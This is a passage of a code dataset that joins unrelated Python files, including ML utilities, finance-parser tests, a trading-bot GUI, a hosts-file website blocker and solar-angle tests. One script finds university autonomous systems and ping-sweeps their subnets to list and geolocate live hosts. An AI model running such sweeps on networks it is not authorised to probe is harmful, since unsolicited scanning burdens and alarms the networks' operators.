True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"536780904","text":"\"\"\"General utility functions\"\"\"\n# ToDo(Andrew): Fininsh implementing Params class\nimport json\nimport logging\n\ndef _preprocess_numpy_input(x, data_format, mode):\n \"\"\"Preprocesses a Numpy array encoding a batch of images.\n\n Arguments:\n x: Input array, 3D or 4D.\n data_format: Data format of the image array.\n mode: One of \"caffe\", \"tf\" or \"torch\".\n - caffe: will convert the images from RGB to BGR,\n then will zero-center each color channel with\n respect to the ImageNet dataset,\n without scaling.\n - tf: will scale pixels between -1 and 1,\n sample-wise.\n - torch: will scale pixels between 0 and 1 and then\n will normalize each channel with respect to the\n ImageNet dataset.\n\n Returns:\n Preprocessed Numpy array.\n \"\"\"\n if mode == 'tf':\n x /= 127.5\n x -= 1.\n return x\n\n if mode == 'torch':\n x /= 255.\n mean = [0.485, 0.456, 0.406]\n std = [0.229, 0.224, 0.225]\n else:\n if 
data_format == 'channels_first':\n            # 'RGB'->'BGR'\n            if x.ndim == 3:\n                x = x[::-1, ...]\n            else:\n                x = x[:, ::-1, ...]\n        else:\n            # 'RGB'->'BGR'\n            x = x[..., ::-1]\n        mean = [103.939, 116.779, 123.68]\n        std = None\n\n    # Zero-center by mean pixel\n    if data_format == 'channels_first':\n        if x.ndim == 3:\n            x[0, :, :] -= mean[0]\n            x[1, :, :] -= mean[1]\n            x[2, :, :] -= mean[2]\n            if std is not None:\n                x[0, :, :] /= std[0]\n                x[1, :, :] /= std[1]\n                x[2, :, :] /= std[2]\n        else:\n            x[:, 0, :, :] -= mean[0]\n            x[:, 1, :, :] -= mean[1]\n            x[:, 2, :, :] -= mean[2]\n            if std is not None:\n                x[:, 0, :, :] /= std[0]\n                x[:, 1, :, :] /= std[1]\n                x[:, 2, :, :] /= std[2]\n    else:\n        x[..., 0] -= mean[0]\n        x[..., 1] -= mean[1]\n        x[..., 2] -= mean[2]\n        if std is not None:\n            x[..., 0] /= std[0]\n            x[..., 1] /= std[1]\n            x[..., 2] /= std[2]\n    return x\n\n\nclass Params():\n    \"\"\"Class that loads hyperparameters from a json file.\n\n    Example:\n    ```\n    params = Params(json_path)\n    print(params.learning_rate)\n    params.learning_rate = 0.5  # change the value of learning_rate in params\n    ```\n    \"\"\"\n\n    def __init__(self, json_path):\n        self.update(json_path)\n\n    def save(self, json_path):\n        \"\"\"Saves parameters to json file\"\"\"\n        with open(json_path, 'w') as f:\n            json.dump(self.__dict__, f, indent=4)\n\n    def update(self, json_path):\n        \"\"\"Loads parameters from json file\"\"\"\n        with open(json_path) as f:\n            params = json.load(f)\n        self.__dict__.update(params)\n\n    @property\n    def dict(self):\n        \"\"\"Gives dict-like access to Params instance by `params.dict`['learning_rate']\"\"\"\n        return self.__dict__\n\ndef set_logger(log_path):\n    \"\"\"Sets the logger to log info in terminal and file `log_path`\n\n    In general, it is useful to have a logger so that every output to the terminal\n    is saved in a permanent file. 
Here we save it to model_dir/train.log\n\n    Example:\n    ```\n    logging.info(\"Starting training...\")\n    ```\n\n    Args:\n        log_path: (string) where to log\n    \"\"\"\n\n    logger = logging.getLogger()\n    logger.setLevel(logging.INFO)\n\n    if not logger.handlers:\n        # Logging to a file\n        file_handler = logging.FileHandler(log_path)\n        file_handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))\n        logger.addHandler(file_handler)\n\n        # Logging to console\n        stream_handler = logging.StreamHandler()\n        stream_handler.setFormatter(logging.Formatter('%(message)s'))\n        logger.addHandler(stream_handler)\n\n\ndef save_dict_to_json(d, json_path):\n    \"\"\"Saves dict of floats in json file\n\n    Args:\n        d: (dict) of float-castable values (np.float, int, float, etc.)\n        json_path: (string) path to json file\n    \"\"\"\n    with open(json_path, 'w') as f:\n        # We need to convert the values to float for json\n        # (it does not accept np.array, np.float)\n        d = {k: float(v) for k, v in d.items()}\n        json.dump(d, f, indent=4)\n","sub_path":"model/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"476672727","text":"import os\nimport json\nfrom datetime import date\nimport pandas as pd\nfrom pyfinmod.financials import Financials\n\nraw_data_dir = os.path.join(os.path.dirname(__file__), 'raw_data')\n\n\ndef test_date_parser():\n    assert Financials._date_parse(\"2018-9-29\") == date(2018, 9, 29)\n\n\ndef test_get_balance_sheet():\n    parser = Financials(\"AAPL\")\n    with open(os.path.join(raw_data_dir, \"aapl_balance_sheet.json\"), \"r\") as f:\n        json_data = json.load(f)\n\n    parser._fetch_json = lambda x: {\"financials\": json_data}\n\n    df = parser.balance_sheet_statement\n    assert not df.empty\n\n    df_test = pd.read_hdf(os.path.join(raw_data_dir, \"aapl_balance_sheet.hdf\"), key=\"aapl_balance_sheet\")\n    assert df.equals(df_test)\n\n\ndef test_get_income_statement():\n    parser = Financials(\"AAPL\")\n    with open(os.path.join(raw_data_dir, \"aapl_income_statement.json\"), \"r\") as f:\n        json_data = json.load(f)\n    parser._fetch_json = lambda x: json_data\n\n    df = parser.income_statement\n    assert not df.empty\n\n    df_test = pd.read_hdf(os.path.join(raw_data_dir, \"aapl_income_statement.hdf\"), key=\"aapl_income_statement\")\n    assert df.equals(df_test)\n\n\ndef test_get_cash_flow():\n    parser = Financials(\"AAPL\")\n    with open(os.path.join(raw_data_dir, \"aapl_cash_flow.json\"), \"r\") as f:\n        json_data = json.load(f)\n    parser._fetch_json = lambda x: json_data\n\n    df = parser.cash_flow_statement\n    assert not df.empty\n\n    df_test = pd.read_hdf(os.path.join(raw_data_dir, \"aapl_cash_flow.hdf\"), key=\"aapl_cash_flow\")\n    assert df.equals(df_test)\n\n\ndef test_get_market_cap():\n    parser = Financials(\"AAPL\")\n    parser._fetch_json(\"profile\")\n    with open(os.path.join(raw_data_dir, \"aapl_summary.json\"), \"r\") as f:\n        json_data = json.load(f)\n    parser._fetch_json = lambda x: json_data\n    mktCap = parser.mktCap\n    assert mktCap == float(1230468047640.00)\n","sub_path":"tests/test_financials_parser.py","file_name":"test_financials_parser.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"356160055","text":"import time\nimport webbrowser\nfrom threading import Thread\n\nfrom dexbot import __version__\nfrom dexbot.config import Config\nfrom dexbot.controllers.wallet_controller import WalletController\nfrom dexbot.qt_queue.idle_queue import 
idle_add\nfrom dexbot.qt_queue.queue_dispatcher import ThreadDispatcher\nfrom dexbot.views.create_wallet import CreateWalletView\nfrom dexbot.views.create_worker import CreateWorkerView\nfrom dexbot.views.errors import gui_error\nfrom dexbot.views.layouts.flow_layout import FlowLayout\nfrom dexbot.views.settings import SettingsView\nfrom dexbot.views.ui.worker_list_window_ui import Ui_MainWindow\nfrom dexbot.views.unlock_wallet import UnlockWalletView\nfrom dexbot.views.worker_item import WorkerItemWidget\nfrom grapheneapi.exceptions import NumRetriesReached\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QFontDatabase\nfrom PyQt5.QtWidgets import QMainWindow\n\n\nclass MainView(QMainWindow, Ui_MainWindow):\n    def __init__(self, main_controller):\n        super().__init__()\n        self.setupUi(self)\n        self.main_controller = main_controller\n\n        self.config = main_controller.config\n        self.max_workers = 10\n        self.num_of_workers = 0\n        self.worker_widgets = {}\n        self.closing = False\n        self.status_bar_updater = None\n        self.statusbar_updater_first_run = True\n        self.main_controller.set_info_handler(self.set_worker_status)\n        self.layout = FlowLayout(self.scrollAreaContent)\n        self.dispatcher = None\n\n        # GUI buttons\n        self.add_worker_button.clicked.connect(self.handle_add_worker)\n        self.settings_button.clicked.connect(self.handle_open_settings)\n        self.help_button.clicked.connect(self.handle_open_documentation)\n        self.unlock_wallet_button.clicked.connect(self.handle_login)\n\n        # Hide certain buttons by default until login success\n        self.add_worker_button.hide()\n\n        self.status_bar.showMessage(\"ver {} - Node disconnected\".format(__version__))\n\n        QFontDatabase.addApplicationFont(\":/bot_widget/font/SourceSansPro-Bold.ttf\")\n\n    def connect_to_bitshares(self):\n        # Check if there is already a connection\n        if self.config['node']:\n            # Test nodes first. This only checks if we're able to connect\n            self.status_bar.showMessage('Connecting to Bitshares...')\n            try:\n                self.main_controller.measure_latency(self.config['node'])\n            except NumRetriesReached:\n                self.status_bar.showMessage(\n                    'ver {} - Couldn\\'t connect to Bitshares. '\n                    'Please use different node(s) and retry.'.format(__version__)\n                )\n                self.main_controller.set_bitshares_instance(None)\n                return False\n\n            self.main_controller.new_bitshares_instance(self.config['node'])\n            self.status_bar.showMessage(self.get_statusbar_message())\n            return True\n        else:\n            # Config has no nodes in it\n            self.status_bar.showMessage(\n                'ver {} - Node(s) not found. 
' 'Please add node(s) from settings.'.format(__version__)\n )\n return False\n\n @pyqtSlot(name='handle_login')\n def handle_login(self):\n if not self.main_controller.bitshares_instance:\n if not self.connect_to_bitshares():\n return\n\n wallet_controller = WalletController(self.main_controller.bitshares_instance)\n\n if wallet_controller.wallet_created():\n unlock_view = UnlockWalletView(wallet_controller)\n else:\n unlock_view = CreateWalletView(wallet_controller)\n\n if unlock_view.exec_():\n # Hide button once successful wallet creation / login\n self.unlock_wallet_button.hide()\n self.add_worker_button.show()\n\n # Load worker widgets from config file\n workers = self.config.workers_data\n for worker_name in workers:\n self.add_worker_widget(worker_name)\n\n # Limit the max amount of workers so that the performance isn't greatly affected\n if self.num_of_workers >= self.max_workers:\n self.add_worker_button.setEnabled(False)\n break\n\n # Dispatcher polls for events from the workers that are used to change the ui\n self.dispatcher = ThreadDispatcher(self)\n self.dispatcher.start()\n\n self.status_bar.showMessage(\"ver {} - Node delay: - ms\".format(__version__))\n self.status_bar_updater = Thread(target=self._update_statusbar_message)\n self.status_bar_updater.start()\n\n def add_worker_widget(self, worker_name):\n config = self.config.get_worker_config(worker_name)\n widget = WorkerItemWidget(worker_name, config, self.main_controller, self)\n widget.setFixedSize(widget.frameSize())\n self.layout.addWidget(widget)\n self.worker_widgets[worker_name] = widget\n\n # Limit the max amount of workers so that the performance isn't greatly affected\n self.num_of_workers += 1\n if self.num_of_workers >= self.max_workers:\n self.add_worker_button.setEnabled(False)\n\n def remove_worker_widget(self, worker_name):\n self.worker_widgets.pop(worker_name, None)\n\n self.num_of_workers -= 1\n if self.num_of_workers < self.max_workers:\n self.add_worker_button.setEnabled(True)\n\n def change_worker_widget_name(self, old_worker_name, new_worker_name):\n worker_data = self.worker_widgets.pop(old_worker_name)\n self.worker_widgets[new_worker_name] = worker_data\n\n @pyqtSlot(name='handle_add_worker')\n @gui_error\n def handle_add_worker(self):\n create_worker_dialog = CreateWorkerView(self.main_controller.bitshares_instance)\n return_value = create_worker_dialog.exec_()\n\n # User clicked save\n if return_value == 1:\n worker_name = create_worker_dialog.worker_name\n self.main_controller.create_worker(worker_name)\n\n self.config.add_worker_config(worker_name, create_worker_dialog.worker_data)\n self.add_worker_widget(worker_name)\n\n @pyqtSlot(name='handle_open_settings')\n @gui_error\n def handle_open_settings(self):\n settings_dialog = SettingsView()\n reconnect = settings_dialog.exec_()\n\n if reconnect:\n # Reinitialize config after closing the settings window\n self.config = Config()\n self.main_controller.config = self.config\n\n self.connect_to_bitshares()\n\n @staticmethod\n @pyqtSlot(name='handle_open_documentation')\n def handle_open_documentation():\n webbrowser.open('https://github.com/Codaone/DEXBot/wiki')\n\n def set_worker_name(self, worker_name, value):\n self.worker_widgets[worker_name].set_worker_name(value)\n\n def set_worker_account(self, worker_name, value):\n self.worker_widgets[worker_name].set_worker_account(value)\n\n def set_worker_profit(self, worker_name, value):\n self.worker_widgets[worker_name].set_worker_profit(value)\n\n def set_worker_market(self, worker_name, 
value):\n        self.worker_widgets[worker_name].set_worker_market(value)\n\n    def set_worker_slider(self, worker_name, value):\n        self.worker_widgets[worker_name].set_worker_slider(value)\n\n    def customEvent(self, event):\n        # Process idle_queue_dispatcher events\n        event.callback()\n\n    def closeEvent(self, event):\n        self.closing = True\n        self.status_bar.showMessage(\"Closing app...\")\n        if self.status_bar_updater and self.status_bar_updater.is_alive():\n            self.status_bar_updater.join()\n\n    def _update_statusbar_message(self):\n        while not self.closing:\n            # When running for the first time the workers are also contending for the\n            # connection, so we delay the first update to get correct information\n            if self.statusbar_updater_first_run:\n                self.statusbar_updater_first_run = False\n                time.sleep(1)\n\n            msg = self.get_statusbar_message()\n            idle_add(self.set_statusbar_message, msg)\n            runner_count = 0\n            # Wait for 30s but do it in 0.5s pieces so we do not prevent closing the app\n            while not self.closing and runner_count < 60:\n                runner_count += 1\n                time.sleep(0.5)\n\n    def get_statusbar_message(self):\n        node = self.main_controller.bitshares_instance.rpc.url\n        try:\n            latency = self.main_controller.measure_latency(node)\n        except BaseException:\n            latency = -1\n\n        if latency != -1:\n            return \"ver {} - Node delay: {:.2f}ms - node: {}\".format(__version__, latency, node)\n        else:\n            return \"ver {} - Node disconnected\".format(__version__)\n\n    def set_statusbar_message(self, msg):\n        self.status_bar.showMessage(msg)\n\n    def set_worker_status(self, worker_name, level, status):\n        if worker_name != 'NONE':\n            worker = self.worker_widgets.get(worker_name, None)\n            if worker:\n                worker.set_status(status)\n","sub_path":"dexbot/views/worker_list.py","file_name":"worker_list.py","file_ext":"py","file_size_in_byte":9171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"311832691","text":"import pygame\n\nfrom Abstract.PlayObject import PlayObject\n\n\nclass Block(PlayObject):\n    def __init__(self, xpos, ypos):\n        super().__init__(xpos, ypos, \"img/block.png\")\n        self.speed = -5\n        self.speed_increase_step = -1.5\n        self.real_speed = self.speed\n        self.visible = True\n\n    def move(self):\n        # if x < 0 then the block moves down\n        if self.x < 0:\n            self.y += 40 / (50/abs(self.speed))\n        self.x += self.real_speed\n        w, h = self.bitmap.get_size()\n        w += round(abs(self.speed)+0.5)\n        self.bitmap = pygame.transform.scale(self.bitmap, (w, h))\n\n    def reset(self):\n        self.bitmap = pygame.transform.scale(self.bitmap, (self.w, self.h))\n        self.x = 800\n        self.y = 360\n        self.real_speed = self.speed\n        self.visible = True\n\n    def increase_speed(self):\n        self.speed += self.speed_increase_step\n\n","sub_path":"playobjects/Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"397085144","text":"\"\"\"\nTo exit a while loop immediately, without running any remaining code in\nthe loop, regardless of the result of any conditional test, use the break\nstatement. The break statement directs the flow of your program; we can\nuse it to control which lines of code are executed and which are not, so\nthat the program runs only the code you want, when you want it.\n\nFor example, consider a program that asks users for the\nnames of places they have visited. 
We can stop the while\nloop in this program by calling break as soon as the user enters the value\n'quit':\n\"\"\"\n\nprompt = \"\\nEnter the name of a city you have visited recently: \"\nprompt += \"\\n(Enter 'quit' to exit the program.) \"\n\nwhile True:\n    cidade = input(prompt)\n\n    if cidade == 'quit':\n        break\n    else:\n        print(\"I love traveling to \" + cidade.title() + \"!\")","sub_path":"Capitulo 7/cidades.py","file_name":"cidades.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"637418955","text":"#!/usr/bin/env python\n\"\"\"Creates a csv of hosts residing within autonomous systems\n of universities.\n\"\"\"\n\nimport bin_tools\nimport worker_threads\n\nimport subprocess\nfrom queue import Queue, Empty\nfrom threading import Thread\nimport IP2Location\n\ndef create_university_lookup():\n    \"\"\"Find university AS, find pingable hosts within AS, then export to csv\"\"\"\n\n    uni_AS_dict = get_uni_AS()\n    uni_IP_subnet_dict = get_uni_IP_subnet(uni_AS_dict)\n    print(\"IPs and subnets found\")\n\n    uni_pingable_hosts = find_pingable_hosts(uni_IP_subnet_dict)\n\n    uni_pingable_hosts = add_host_location(uni_pingable_hosts)\n\n    write_hosts_to_file(uni_pingable_hosts)\n\ndef get_uni_AS():\n    \"\"\"Retrieve names of universities and their Autonomous System (AS) number from maxmind.com\"\"\"\n\n    # Adapted from https://stackoverflow.com/questions/13332268/python-subprocess-command-with-pipe\n    AS_uni_cmd = 'curl -s http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNum2.zip | gunzip | cut -d\",\" -f3 | sed \\'s/\"//g\\' | sort -u | grep \\'University\\\\|College\\''\n    AS_uni_proc = subprocess.Popen(AS_uni_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n    AS_uni_out = str(AS_uni_proc.communicate()[0])\n\n    # Remove leading 'b'\n    AS_uni_out = AS_uni_out[1:]\n\n    AS_uni_split = AS_uni_out.split(\"\\\\n\")\n\n    # Build dict of {university : AS}\n    uni_AS_dict = {}\n    for AS_uni in AS_uni_split:\n        if AS_uni != '\"':\n            AS = AS_uni.split(\" \")[0]\n            uni_name = ' '.join(AS_uni.split(\" \")[1:])\n            uni_AS_dict[uni_name] = AS\n\n    return uni_AS_dict\n\ndef get_uni_IP_subnet(uni_AS_dict):\n    \"\"\"Leverage 'whois' to get a subnet associated with university AS\"\"\"\n\n    uni_IP_subnet_dict = {}\n    for uni, AS in iter(uni_AS_dict.items()):\n        whois_AS_cmd = 'whois -h whois.radb.net -- \\'-i origin ' + AS + '\\' | grep -Eo \"([0-9.]+){4}/[0-9]+\"'\n        whois_AS_proc = subprocess.Popen(whois_AS_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n        whois_AS_out = str(whois_AS_proc.communicate()[0])\n\n        # Remove leading \"b'\"\n        whois_AS_out = whois_AS_out[2:]\n\n        whois_AS_first_IP_range = whois_AS_out.split(\"\\\\n\")[0]\n\n        if whois_AS_first_IP_range != \"'\":\n            uni_IP_subnet_dict[uni] = whois_AS_first_IP_range.split(\"/\")\n\n    return uni_IP_subnet_dict\n\ndef find_pingable_hosts(uni_IP_subnet_dict):\n    \"\"\"Ping hosts within university subnets to gather hosts that respond to pings\"\"\"\n\n    uni_pingable_hosts = {}\n    for uni, (subnet, mask) in iter(uni_IP_subnet_dict.items()):\n\n        # Get all possible IPv4 addresses within subnet\n        subnet_possibilities = get_possible_subnet_addrs(subnet, mask)\n\n        # Build a queue of all of the subnet addresses\n        queue = Queue()\n        for addr in subnet_possibilities:\n            queue.put(addr)\n\n        # Create threads that accumulate results in pingable_hosts\n        end_queue = Queue()\n        num_threads = 200\n        pingable_hosts = []\n        threads = []\n
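        # Editor's note: each worker thread pulls addresses off the shared queue and\n        # appends hosts that answer a ping to pingable_hosts (see\n        # worker_threads.ping_worker_end_if_found, an external helper module).\n        for _ in 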
range(num_threads):\n            t = Thread(target=worker_threads.ping_worker_end_if_found, args=(queue, pingable_hosts, end_queue, num_threads))\n            t.start()\n            threads.append(t)\n\n        for thread in threads:\n            thread.join()\n\n        try:\n            hosts_dict = {host: [0, 0] for host, _ in pingable_hosts}\n            uni_pingable_hosts[uni] = hosts_dict\n        except:\n            pass\n\n    return uni_pingable_hosts\n\ndef get_possible_subnet_addrs(subnet, mask):\n    \"\"\"Get all possible IPv4 addresses within subnet\"\"\"\n\n    mask = int(mask)\n\n    bin_possibilities = bin_tools.bin_combinations(32 - mask)\n\n    # Exclude the first and last addresses of the subnet: x.x.x.0 and x.x.x.255\n    # x.x.x.0 is usually not used by convention and x.x.x.255 is reserved for a broadcast address\n    bin_possibilities = bin_possibilities[1:-1]\n\n    # Get the entire binary representation of all possible subnet IPv4 addresses\n    subnet_bin = bin_tools.quad_to_bin_str(subnet)\n    subnet_possibilities_bin = []\n    for combo in bin_possibilities:\n        subnet_possibilities_bin.append(subnet_bin[:mask] + combo)\n\n    # Transform binary addresses to IPv4\n    subnet_possibilities = [bin_tools.bin_to_dotted_quad(i) for i in subnet_possibilities_bin]\n\n    return subnet_possibilities\n\ndef add_host_location(uni_pingable_hosts):\n    \"\"\"Add host's latitude and longitude to dictionary\"\"\"\n\n    # Open IP2Location binary\n    IP2_Loc = IP2Location.IP2Location()\n    IP2_Loc.open(\"IP2LOCATION-LITE-DB5.BIN\")\n\n    for uni, hosts_dict in iter(uni_pingable_hosts.items()):\n        for host, _ in iter(hosts_dict.items()):\n\n            record = IP2_Loc.get_all(host)\n            if record:\n                hosts_dict[host] = [record.latitude, record.longitude]\n            else:\n                # Delete host that does not have a location\n                del hosts_dict[host]\n\n        uni_pingable_hosts[uni] = hosts_dict\n\n    return uni_pingable_hosts\n\ndef write_hosts_to_file(uni_pingable_hosts):\n    \"\"\"Write university host locations to csv\"\"\"\n\n    with open('university_hosts.csv', mode='w') as hosts_file:\n        # Create csv rows in format 'university, host_addr: latitude longitude'\n        pingable_unis = 0\n        for uni, hosts in iter(uni_pingable_hosts.items()):\n            if hosts:\n                host_loc_str = ','\n                for addr, loc in iter(hosts.items()):\n                    host_loc_str += addr + \":\" + ' '.join([str(i) for i in loc]) + \",\"\n\n                host_loc_str = host_loc_str[:-1]\n                hosts_file.write(uni + host_loc_str + \"\\n\")\n                pingable_unis += 1\n\n        print(\"{} universities written to csv.\".format(pingable_unis))\n\n\ncreate_university_lookup()","sub_path":"myNet/university_lookup.py","file_name":"university_lookup.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} {"seq_id":"259700639","text":"# Copyright (C) 2018 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\"\"\"A facade for RestService.\nReasons for a facade:\n* It is not very convenient to use\n* More high level functions are often needed\n\"\"\"\nfrom lib.constants.element import AdminWidgetCustomAttributes\nfrom lib.entities.entities_factory import CustomAttributeDefinitionsFactory\nfrom lib.entities.entity import Representation\nfrom lib.service import rest_service\nfrom lib.utils.string_utils import StringMethods\n\n\ndef create_program():\n    \"\"\"Create a program\"\"\"\n    return rest_service.ProgramsService().create_objs(count=1)[0]\n\n\ndef create_objective(program=None):\n    \"\"\"Create an objective (optionally map to a `program`).\"\"\"\n    objective = rest_service.ObjectivesService().create_objs(count=1)[0]\n    if program:\n        map_objs(program, 
objective)\n return objective\n\n\ndef create_control(program=None):\n \"\"\"Create a control (optionally map to a `program`)\"\"\"\n control = rest_service.ControlsService().create_objs(count=1)[0]\n if program:\n map_objs(program, control)\n return control\n\n\ndef create_audit(program):\n \"\"\"Create an audit within a `program`\"\"\"\n return rest_service.AuditsService().create_objs(\n count=1, program=program.__dict__)[0]\n\n\ndef create_asmt_template(audit, **attrs):\n \"\"\"Create assessment template.\"\"\"\n attrs[\"audit\"] = audit.__dict__\n return rest_service.AssessmentTemplatesService().create_objs(\n count=1, **attrs)[0]\n\n\ndef create_asmt_template_w_dropdown(audit, dropdown_types_list):\n \"\"\"Create assessment template with dropdown custom attribute.\"\"\"\n multi_choice_mandatory = {\"file\": \"2\", \"url\": \"4\", \"comment\": \"1\",\n \"file_url\": \"6\", \"url_comment\": \"5\",\n \"file_comment\": \"3\", \"file_url_comment\": \"7\",\n \"nothing\": \"0\"}\n ca_definitions_factory = CustomAttributeDefinitionsFactory()\n custom_attribute_definitions = [ca_definitions_factory.create(\n title=(ca_definitions_factory.generate_ca_title(\n AdminWidgetCustomAttributes.DROPDOWN)),\n attribute_type=AdminWidgetCustomAttributes.DROPDOWN,\n definition_type=AdminWidgetCustomAttributes.DROPDOWN,\n multi_choice_mandatory=(\",\".join(\n multi_choice_mandatory[dropdown_type]\n for dropdown_type in dropdown_types_list)),\n multi_choice_options=(\n StringMethods.random_list_strings(\n list_len=len(dropdown_types_list))))]\n custom_attribute_definitions = (ca_definitions_factory.\n generate_ca_defenitions_for_asmt_tmpls(\n custom_attribute_definitions))\n return create_asmt_template(\n audit, custom_attribute_definitions=custom_attribute_definitions)\n\n\ndef create_asmt_from_template_rest(\n audit, control, asmt_template\n):\n \"\"\"Create new Assessment based on Assessment Template via REST API.\n Return: lib.entities.entity.AssessmentEntity\n \"\"\"\n control_snapshots = [Representation.convert_repr_to_snapshot(\n objs=control, parent_obj=audit)]\n assessments_service = rest_service.AssessmentsFromTemplateService()\n assessments = assessments_service.create_assessments(\n audit=audit,\n template=asmt_template,\n control_snapshots=control_snapshots\n )\n return assessments[0]\n\n\ndef create_assessment(audit, **attrs):\n \"\"\"Create an assessment within an audit `audit`\"\"\"\n attrs[\"audit\"] = audit.__dict__\n return rest_service.AssessmentsService().create_objs(\n count=1, **attrs)[0]\n\n\ndef create_issue(program=None):\n \"\"\"Create a issue (optionally map to a `program`)\"\"\"\n issue = rest_service.IssuesService().create_objs(count=1)[0]\n if program:\n map_objs(program, issue)\n return issue\n\n\ndef map_objs(src_obj, dest_obj):\n \"\"\"Map two objects to each other\"\"\"\n rest_service.RelationshipsService().map_objs(\n src_obj=src_obj, dest_objs=dest_obj)\n\n\ndef get_snapshot(obj, parent_obj):\n \"\"\"Get (or create) a snapshot of `obj` in `parent_obj`\"\"\"\n return rest_service.ObjectsInfoService().get_snapshoted_obj(\n origin_obj=obj, paren_obj=parent_obj)\n\n\ndef map_to_snapshot(src_obj, obj, parent_obj):\n \"\"\"Create a snapshot of `obj` in `parent_obj`.\n Then map `src_obj` to this snapshot.\n \"\"\"\n snapshot = get_snapshot(obj, parent_obj)\n map_objs(src_obj, 
snapshot)\n","sub_path":"test/selenium/src/lib/service/rest_facade.py","file_name":"rest_facade.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"377730433","text":"#Variables required:\n#one for path of hostfile\n#one for the list of website to be blocked\n#one for loopback ip 127.0.0.1\nfrom datetime import datetime as dt\nimport time\n\n#host_path = r\"C:\\Z Virtual Machines\\Python Code\\Website Blocker\\hosts\"\nhost_path = r\"C:\\Windows\\System32\\drivers\\etc\\hosts\"\nblock_website = [\"www.facebook.com\",\"facebook.com\",\"www.xnxx.com\",\"www.xvideos.com\",\"www.youporn.com\",\"www.pornhub.com\",\"www.pornhum.com\",\"www.indianpornvideos.com\",\"xhamster.com\",\"www.porn300.com\",\"www.kalporn.com\",\"indiasex.org\",\"www.fastindianporn.com\"]\n# this can be included in above list when needed \"www.amazon.in\",\"www.amazon.com\",\"www.flipkart.com\",\"www.snapdeal.com\",\"www.ebay.in\",\"www.ebay.com\"\nloop_back = \"127.0.0.1\"\n#print(dt.now()) print like 2017-10-26 11:49:16.906423\n#print(dt(dt.now().year, dt.now().month, dt.now().day, 8)) #prints like 2017-10-26 08:00:00\n\nwhile True:\n if dt(dt.now().year, dt.now().month, dt.now().day, 17) < dt.now() < dt(dt.now().year, dt.now().month, dt.now().day, 18):\n print(\"Work Hours!!\")\n with open(host_path,\"r+\") as host_file:\n content = host_file.read()\n for website in block_website:\n if website in content:\n pass\n else:\n host_file.write(loop_back + \" \" + website + \"\\n\")\n else:\n print(\"Enjoy! no internet restrictions, Fun Hours!!\")\n with open(host_path,\"r+\") as host_file:\n content = host_file.readlines()\n host_file.seek(0) #moving the cursor at the begining after readline() as it moves cursor to the end of file\n for line in content:\n if not any(website in line for website in block_website): #loops each item in block_website list and comares agains the specific line in content which is holding each line of the hos_file as list\n host_file.write(line) #if those block webside line is found that is ot written\n host_file.truncate() #As the each new line is written above the existing lines in file once for loop finishes all the following or old content is dleeted\n #if host_file.seek(0) wasn't used the truncate will delete nothing as the new lines weree ritten at the nod exisiting lines and after tye new lines are wroitten nothing would eb taher to runcate\n #So for loop above will keep appening the lines again and again in the host_file\n time.sleep(5)\n","sub_path":"Website Blocker/websiteblocker_process.pyw","file_name":"websiteblocker_process.pyw","file_ext":"pyw","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"416524935","text":"import numpy as np\nimport unittest\nimport datetime\nimport funcs\nimport hw5\n\n\nclass TestIsNear(unittest.TestCase):\n def test_is_near(self):\n assert funcs.is_near(5, 2, 1) == False\n assert funcs.is_near(1.5, 2, 1) == True\n assert funcs.is_near(2.5, 2, 1) == True\n\n\nclass TestHourAngle(unittest.TestCase):\n def test_hour_angle_values(self):\n time1 = datetime.time(8, 0, 0)\n time2 = datetime.time(16, 0, 0)\n time3 = datetime.time(8, 33, 0)\n\n omega_expected_1 = -60\n omega_expected_2 = 60\n omega_expected_3 = -51.75\n\n omega1 = funcs.hour_angle(time1)\n omega2 = funcs.hour_angle(time2)\n omega3 = funcs.hour_angle(time3)\n\n assert omega1 - omega_expected_1 == 0\n assert omega2 - 
omega_expected_2 == 0\n assert omega3 - omega_expected_3 == 0\n\n\nclass TestIncidenceAngle(unittest.TestCase):\n def test_incidence_angle_values(self):\n pass\n\n\nclass TestSolarAzimuthAngle(unittest.TestCase):\n def test_solar_azimuth_angle_values(self):\n omega = 7.35\n thetaz = 9.03\n phi = 29.65\n delta = 23.45\n\n gamma_s_expected = 48.38\n tol = 0.02\n\n gamma_s = funcs.solar_azimuth_angle(omega, thetaz, phi, delta)\n\n assert funcs.is_near(gamma_s, gamma_s_expected, tol)\n\n\nclass TestSolarTime(unittest.TestCase):\n def test_solar_time_values(self):\n pass\n\n\nclass TestZenithAngle(unittest.TestCase):\n def test_zenith_angle_values(self):\n phi = 29.65\n delta = 23.45\n omega = 7.35\n\n thetaz_expected = 9.03\n tol = 0.005\n\n thetaz = funcs.zenith_angle(phi, delta, omega)\n\n assert funcs.is_near(thetaz, thetaz_expected, tol)\n\n# Tests for ray tracing code\nclass TestRayTraceing(unittest.TestCase):\n theta = 5\n f = 2\n # Points to test x1 = -2.5 and x1 = 1.5\n def test_oneD_parabola(self):\n # Create expected values\n y1a_expect = 0.78125\n y1b_expect = 0.28125\n\n # Calculated the values\n y1a = 